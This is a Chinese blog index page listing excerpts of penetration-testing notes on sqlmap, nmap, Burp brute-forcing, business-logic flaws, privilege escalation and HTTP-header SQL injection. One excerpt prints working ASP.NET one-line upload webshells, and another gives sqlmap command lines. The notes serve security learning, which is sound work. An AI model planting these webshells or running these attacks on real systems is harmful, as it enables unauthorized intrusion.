| 共 88 篇文章 |
|
SqlMap检测注入点。-r sqlmap可以从一个文本文件中获取HTTP请求,这样就可以跳过设置一些其他参数。例如: sqlmap.py -u "http://www.code521.com/index.php" --data="id=1" -f --banner --dbs --users 注意:项目实战中,post提交的数据中只是测试单个的参数是否存在sql注入的话这样用,测试所有的post用-r 结... 阅255 转0 评0 公众公开 19-11-16 23:08 |
IP协议(Internet Protocol)网际协议----计算机之间通信。ICMP协议(Internet Control Message Protocol)控制报文协议,是TCP/IP的子协议----针对错误和状态。TCP协议(Transmission Control Protocol)传输控制协议----应用程序之间通信。TCP加强传输数据的可靠性。TCP(传输控制协议)、UDP(用户数据报协议)、IP(网际协议)、ICMP(因特... 阅60 转0 评0 公众公开 19-11-12 12:32 |
sU这种扫描技术用来寻找目标主机打开的UDP端口。sV用来扫描目标主机和端口上运行的软件的版本,它需要从开放的端口获取信息来判断软件的版本,扫描速度会慢一些。-default:使用-sC或-A选项扫描时候默认的脚本,提供基本脚本扫描能力;使用方法:nmap--script=‘$类别/$具体的脚本‘,例:nmap --script dns-brute xxx.xx.xx(目标) ,使用dns-br... 阅364 转0 评0 公众公开 19-11-01 22:35 |
%>//Jscript的asp.net一句话<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%>//C#的asp.net一句话<% If Request.Files.Count <>0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>//VB的asp.net一句话。 阅54 转0 评0 公众公开 19-11-01 22:29 |
b、漏洞扫描开始检测漏洞,如XSS,XSRF,sql注入,代码执行,命令执行,越权访问,目录读取,任意文件读取,下载,文件包含,远程命令执行,弱口令,上传,编辑器漏洞,暴力破解等。d、权限提升提权服务器,比如windows下mysql的udf提权,serv-u提权,windows低版本的漏洞,如iis6,pr,巴西烤肉,linux脏牛漏洞,linux内核版本漏洞提权,linux下的... 阅1210 转5 评0 公众公开 19-10-31 10:40 |
a) 很多商品限制用户购买数量时,服务器仅在页面通过js脚本限制,未在服务器端校验用户提交的数量,通过抓包修改商品最大数限制,将请求中的商品数量改为大于最大数限制的值,查看能否以修改后的数量完成业务流程。c) 《我的越权之道》URL:http://drops.wooyun.org/tips/7270x08 业务流程乱序。http://wooyun.org/bugs/wooyun-2010-01081840x0... 阅49 转1 评0 公众公开 19-10-31 09:56 |
a)很多商品限制用户购买数量时,服务器仅在页面通过js脚本限制,未在服务器端校验用户提交的数量,通过抓包修改商品最大数限制,将请求中的商品数量改为大于最大数限制的值,查看能否以修改后的数量完成业务流程。http://drops.wooyun.org/web/5048.http://wooyun.org/bugs/wooyun-2010-0108184密码找回逻辑漏洞总结http://drops.wooyun.org/we... 阅39 转1 评0 公众公开 19-10-31 09:40 |
Battering ram特点:一个字典,两个参数,同用户名同密码同样,对于BurpSuite来说,还是会首先使用初始用户名和密码来进行登录,然后对于Battering ram来说,会使用这一个字典去同时匹配两个参数,相当于是同用户名同密码。Pitchfork特点:两个字典,两个参数,同行匹配,短的截至对于Pitchfork,一共有两个字典,第一个字典负责匹配第一项,第二... 阅231 转0 评0 公众公开 19-10-30 23:09 |
暴力破解原理与过程详解一、爆破原理。这一步的作用是,收集构造HTTP数据包所需要的参数,比如cookie、get/post、referer、提交得字段名等。cookie:用在暴力破解过程中保持和服务器的连接referer:一些网站需要验证referer信息,告诉服务器,我是从哪个页面转过来的post/get: 决定数据包的提交方式字段名:通常存放在cookie当中,知道正确的... 阅2054 转3 评0 公众公开 19-10-30 23:07 |
HTTP头信息进行SQL注入。HTTP 查询字符参数(GET):输入参数通过URL发送HTTP 正文参数(POST):输入参数通过HTTP正文发送HTTP Cookie参数:输入参数通过HTTP cookie发送HTTP Headers:HTTP提交应用程序使用的头。Cookie Manager+ 允许查看,编辑和创建新的cookies,它也提供显示cookies的一些额外信息,支持同时修改多个cookies,而且我们可... 阅140 转1 评0 公众公开 19-10-30 22:53 |
